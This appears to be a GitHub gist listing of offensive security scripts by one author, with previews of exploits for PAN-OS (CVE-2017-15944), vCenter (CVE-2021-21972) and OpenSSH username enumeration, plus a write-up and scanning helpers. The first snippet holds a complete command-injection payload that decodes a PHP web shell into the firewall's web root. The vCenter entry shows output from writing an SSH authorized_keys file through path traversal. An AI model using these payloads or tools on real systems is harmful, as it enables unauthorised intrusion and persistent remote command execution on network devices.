

#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
# Bare disable_warnings() silences every urllib3 warning category (its default
# is the HTTPWarning base class), not only InsecureRequestWarning. It changes
# logging only; TLS certificate verification itself is unaffected by this call.
requests.packages.urllib3.disable_warnings()
# One shared session for the whole proof of concept; presumably so cookies and
# connection state persist between steps (later steps are not in this preview).
session = requests.Session()
def step3_exp():
    """Return the fixed PanDirect JSON-RPC request body sent by this CVE-2017-15944 proof of concept.

    The body is one hard-coded string: the "execute" action, the
    "Administrator.get" call, the "template" value and the malformed "id"
    value are all constants, so nothing about the request is parameterised.

    Returns:
        str: the raw request body, not yet sent anywhere by this function.
    """
    # NOTE(review): the "id" value is where the injection lives. For detection,
    # request logs or WAF rules on the PAN-OS management interface can key on the
    # literal markers visible here (e.g. the "async-mode=" attribute and the
    # base64 blob) rather than on the CVE name.
    exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../var/cores/$(echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==|base64 -d >${PATH:0:1}var${PATH:0:1}appweb${PATH:0:1}htdocs${PATH:0:1}api${PATH:0:1}cmd.php).core -print -exec python -c exec(\\\"PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
    return exp_post
milo2012 / CVE-2017-15944_2.py
Last active Jul 19, 2021
CVE-2017-15944_2.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
import time
# Bare disable_warnings() silences every urllib3 warning category (its default
# is the HTTPWarning base class), not only InsecureRequestWarning. It changes
# logging only; TLS certificate verification itself is unaffected by this call.
requests.packages.urllib3.disable_warnings()
# One shared session for the whole proof of concept; presumably so cookies and
# connection state persist between steps (later steps are not in this preview).
session = requests.Session()
# Directory this variant targets; presumably consumed by step3_exp(command)
# below, whose body is cut off in this preview.
path = "/opt/var.cp/cores"
def step3_exp(command):
milo2012 / CVE-2017-15944.md
Last active Jul 18, 2021
CVE-2017-15944.md

Description

I encountered a situation where the target running PAN-OS was vulnerable to CVE-2017-15944 but I was unable to exploit it using Metasploit.

The issue with exploiting CVE-2017-15944

One of the techniques for exploiting CVE-2017-15944 is to create a file under /opt/pancfg/mgmt/logdb/traffic/1/*, which gets processed by the cron job (/etc/cron.d/indexgen -> /usr/local/bin/genindex_batch.sh). Metasploit uses this technique.

The article at https://tinyhack.com/2019/01/10/alternative-way-to-exploit-cve-2017-15944-on-pan-os-6-1-0/ mentions that it might be impossible to exploit CVE-2017-15944 this way because the script is already running. The same article mentions that the cron job (/etc/cron.d/core_compress -> /usr/local/bin/core_compress) is also vulnerable to command injection.

milo2012 / searchKaliPkg.py
Last active May 17, 2021
Search Kali Repo (http.kali.org)
import sys
import requests
import optparse
from bs4 import BeautifulSoup
import multiprocessing
from requests.packages.urllib3.exceptions import InsecureRequestWarning
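# Suppress only the warning this tool knowingly triggers (unverified TLS).
# The bare disable_warnings() call that used to follow this line silenced every
# urllib3 warning category, which made the targeted call pointless and hid
# unrelated warnings (e.g. platform/system-time issues) that are worth seeing.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)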
def getHTML(url):
milo2012 / Get-System.ps1
Last active Apr 14, 2021
Get-System.ps1
function Get-System {
<#
.SYNOPSIS
GetSystem functionality inspired by Meterpreter's getsystem.
Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: PSReflect
milo2012 / CVE-2010-4180.py
Last active Mar 4, 2021
CVE-2010-4180.py
'''
#https://www.tenable.com/plugins/nessus/51892
% python3 CVE-2010-4180.py -t x.x.x.x
[*] Connecting using Cipher: ECDHE-RSA-AES256-GCM-SHA384
SSL-Session:
Protocol : TLSv1.2
Cipher : ECDHE-RSA-AES256-GCM-SHA384
Session-ID: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
Session-ID-ctx:
milo2012 / CVE-2021-21972.py
Last active Feb 26, 2021
CVE-2021-21972.py
import requests, optparse, concurrent.futures, sys, functools, itertools, tarfile, os, shutil
from requests.packages.urllib3.exceptions import InsecureRequestWarning
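# Suppress only the warning this tool knowingly triggers (unverified TLS).
# The bare disable_warnings() call that used to follow this line silenced every
# urllib3 warning category, which made the targeted call pointless and hid
# unrelated warnings (e.g. platform/system-time issues) that are worth seeing.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)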
'''
% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt -n 8 -e
[*] Creating tmp.tar containing ../../../../../home/vsphere-ui/.ssh/authorized_keys
[+] https://172.16.164.1 SUCCESS
Login using 'ssh -i id_rsa vsphere-ui@x.x.x.x'
'''
milo2012 / CVE-2018-15473.py
Created Jun 1, 2020
SSH Username Enumeration (CVE-2018-15473) - Supports IPv6
# Exploit: OpenSSH 7.7 - Username Enumeration
# Author: Justin Gardner
# Date: 2018-08-20
# Software: https://ftp4.usa.openbsd.org/pub/OpenBSD/OpenSSH/openssh-7.7.tar.gz
# Affected Versions: OpenSSH version < 7.7
# CVE: CVE-2018-15473
###########################################################################
# ____ _____ _____ _ _ #
# / __ \ / ____/ ____| | | | #
milo2012 / extractHTTPfromNmap.py
Last active Sep 17, 2019
This script parses an Nmap XML file and extracts HTTP/HTTPS servers. The problem with Nmap scanning is that it doesn't correctly identify all hosts running HTTP/HTTPS services. This script attempts to fix this issue.
from libnmap.parser import NmapParser
import requests, optparse, os, sys, glob, multiprocessing
from requests.packages.urllib3.exceptions import InsecureRequestWarning
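# Suppress only the warning this tool knowingly triggers (unverified TLS).
# The bare disable_warnings() call that used to follow this line silenced every
# urllib3 warning category, which made the targeted call pointless and hid
# unrelated warnings (e.g. platform/system-time issues) that are worth seeing.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Per-probe timeout in seconds and worker count; presumably consumed by the
# request/worker code further down (not visible in this preview).
timeout = 1.0
numOfThreads = 2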
#This script parses an Nmap XML file and extracts HTTP/HTTPS servers.
#The problem with Nmap scanning is that it doesn't correctly identify all hosts running HTTP/HTTPS services.
$ sudo python msfHelper1.py nmap__190723_132536.xml
[*] Launching Metasploit msfrpcd
[*] Reading from msfHelper.db
[*] Loaded 474 URI paths from msfHelper.db
[*] Loaded 2982 modules from Metasploit
[List of Unique Service Banners]
-------- ----------------------------------------------------------------------------
21/tcp vsftpd version: 2.3.4 ostype: Unix